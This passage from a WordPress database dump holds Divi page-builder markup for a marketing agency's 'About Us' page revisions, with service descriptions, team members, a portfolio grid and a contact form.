type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\" field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 19:14:27','2020-08-07 19:14:27','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(548,1,'2020-08-07 19:18:17','2020-08-07 19:18:17','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about WhatTheHell?\" title_text=\"whatthehell about us\" parallax=\"on\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\" hover_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"dhiraj kumar founder \" title_text=\"dhiraj kumar whatthehell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"dhiraj kumar founder \" title_text=\"travel-portrait-06\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" 